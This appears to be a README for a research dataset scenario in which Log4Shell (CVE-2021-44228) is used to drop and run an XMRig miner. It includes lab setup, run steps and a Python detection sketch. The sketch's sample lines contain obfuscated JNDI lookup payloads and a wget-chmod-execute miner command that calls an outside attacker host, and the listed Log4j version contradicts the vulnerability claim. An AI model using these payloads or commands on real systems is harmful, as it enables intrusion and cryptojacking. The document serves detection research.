T7-24–01–M–NE–CLM
Apache Log4J + XMRig Miner
This attack combines T1-24-01-S-N-CL and T5-24-01-S-E-LM. Two kinds of logs are collected: a packet capture (pcap) and an application log.
It uses the Log4j remote code execution vulnerability (Log4Shell, CVE-2021-44228) to download the miner malware from the attacker's web server onto the victim, grant it execute permission, and run it. Once the miner is running, it consumes a large share of the victim's CPU and reports mining information to the attacker's server.
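The chain above has two detectable halves: the JNDI lookup string arriving in a logged request, and the download/chmod/execute/mine sequence that follows. The Python sketch below is an added example (not part of the dataset or its run.py) that runs both checks over constructed log lines. It keeps the page's attacker address 192.168.56.1 and web-server port 8888; the LDAP port 1389, the /tmp/xmrig path, the pool host and the Apache-style log format are assumptions for illustration. It also handles Log4j's nested-lookup obfuscation (`${${lower:j}ndi:...}`), which a literal `${jndi:` match misses.

```python
"""Detection sketch for the Log4Shell -> miner chain: JNDI lookup strings (including
Log4j nested-lookup obfuscation) in request logs, and download/chmod/execute plus
miner indicators in command logs. Sample lines are constructed, not dataset data."""
from __future__ import annotations
import re

# Constructed sample lines (not taken from the dataset). Lines 0-2 imitate an HTTP
# access log on the victim; line 3 imitates a shell command captured after the RCE.
SAMPLE_LOGS = [
    '192.168.56.1 - - [10/Jan/2024:10:00:01 +0900] "GET /?x=${jndi:ldap://192.168.56.1:1389/Exploit} HTTP/1.1" 200 12',
    '192.168.56.1 - - [10/Jan/2024:10:00:02 +0900] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}dap://192.168.56.1:1389/a}"',
    '192.168.56.1 - - [10/Jan/2024:10:00:03 +0900] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    'sh -c "wget http://192.168.56.1:8888/xmrig -O /tmp/xmrig; chmod +x /tmp/xmrig; /tmp/xmrig -o pool.example:3333 --donate-level 1"',
]

# Log4j resolves nested lookups innermost-first, so ${${lower:j}ndi:...} becomes
# ${jndi:...} only after evaluation; a naive substring match for "${jndi:" misses it.
_CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^{}]*)\}", re.I)  # ${lower:J} -> j
_DEFAULT_LOOKUP = re.compile(r"\$\{[^{}]*:-([^{}]*)\}")            # ${env:X:-j}, ${::-j} -> j
_JNDI = re.compile(r"\$\{jndi:[a-z]+://", re.I)                     # ldap, rmi, dns, ...

# Post-exploitation indicators for the download -> chmod -> execute -> mine sequence.
_DOWNLOAD = re.compile(r"\b(?:wget|curl)\b[^;&|]*https?://\S+", re.I)
_CHMOD_THEN_EXEC = re.compile(r"chmod\s+\+x\s+([^\s;&|]+).*?\1", re.I)  # same path run later
_MINER = re.compile(r"\bxmrig\b|stratum\+tcp://|--donate-level|(?:^|\s)(?:-o|--url)\s+\S+:\d+", re.I)


def normalize_lookups(s: str, max_rounds: int = 20) -> str:
    """Evaluate the lower/upper/default-value lookups an attacker nests to hide ${jndi:.
    Rounds are bounded so a pathological input cannot loop forever."""
    for _ in range(max_rounds):
        new = _CASE_LOOKUP.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(), s)
        new = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), new)
        if new == s:
            break
        s = new
    return s


def classify(line: str) -> set[str]:
    """Return the set of indicator tags found on one log line."""
    tags: set[str] = set()
    norm = normalize_lookups(line)
    if _JNDI.search(norm):
        tags.add("jndi_lookup")
        if norm != line:          # the literal line did not contain ${jndi:...}
            tags.add("obfuscated_lookup")
    if _DOWNLOAD.search(line):
        tags.add("remote_download")
    if _CHMOD_THEN_EXEC.search(line):
        tags.add("chmod_then_exec")
    if _MINER.search(line):
        tags.add("miner_indicator")
    return tags


def scan(lines: list[str]) -> list[tuple[int, list[str]]]:
    """Scan lines in order; return (line_index, sorted tags) for every line that fired."""
    hits = []
    for i, line in enumerate(lines):
        tags = classify(line)
        if tags:
            hits.append((i, sorted(tags)))
    return hits


if __name__ == "__main__":
    for idx, tags in scan(SAMPLE_LOGS):
        print(f"line {idx}: {', '.join(tags)}")
```

The normalisation step is the part worth keeping: the `lower`, `upper` and `:-` default-value lookups are what real Log4Shell payloads nest to slip past WAF signatures, and evaluating them before matching is cheap. The post-exploitation patterns are deliberately narrow; in the dataset's own logs the download source should be the attacker's HTTP server on 192.168.56.1:8888, which is a stronger pivot than the generic `wget`/`chmod` shape.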
| Role     | OS             | IP                                              | Software             |
|----------|----------------|-------------------------------------------------|----------------------|
| Attacker | Windows 11     | 192.168.56.1                                    | jdk-8u20-windows-x64 |
| Victim   | Ubuntu 20.04.1 | 192.168.56.103 (internal), 10.0.2.15 (external) | log4j 2.17.0         |

Log collection time: 90 sec. Program runtime: 120 sec.

Note that Log4j 2.17.0 as listed is not affected by CVE-2021-44228: message lookups were disabled by default in 2.15.0 and removed in 2.16.0, so the JNDI lookup only fires against a 2.x release earlier than 2.15.0. Check the Log4j version actually deployed in the victim image before using the scenario as ground truth for that CVE.
Installing
Install the JDK (jdk-8u20-windows-x64.exe) on the attacker host, then install the Python dependencies:
```
python3 -m pip install -r requirements.txt
```
Using
Run Terminal 1 before Terminal 2: the web server that hosts the miner (Terminal 1) has to be up before the attack script (Terminal 2) is launched.
[Terminal 1]
```
python3 -m http.server 8888
```
[Terminal 2]
```
python3 run.py
```
MITRE ATT&CK Framework
Attack Tactic
Reconnaissance
Resource Development
Initial Access
Execution
Persistence
Privilege Escalation
Defense Evasion
Credential Access
Discovery
Lateral Movement
Collection
Command and Control
Exfiltration
Impact
Logs
```
./log/2024_01_T7_{time}.log   # {time} is YYmmdd_HHMMSS
```
References
[1] NIST, CVE-2021-44228
[2] Trend Micro, "What is the Apache Log4j (Log4Shell) vulnerability?"
[3] AhnLab ASEC, "[Notice] Log4j Core versions affected by the Apache Log4j vulnerability CVE-2021-44228"
[4] Palo Alto Networks, "Another Apache Log4j Vulnerability Is Actively Exploited in the Wild (CVE-2021-44228) (Updated)"
[5] SK Shieldus, "[Research & Technique] Log4Shell vulnerability (CVE-2021-44228)"
[6] XMRig
Copyright (C) 2024, KAIST Cyber Security Research Center. All Rights Reserved.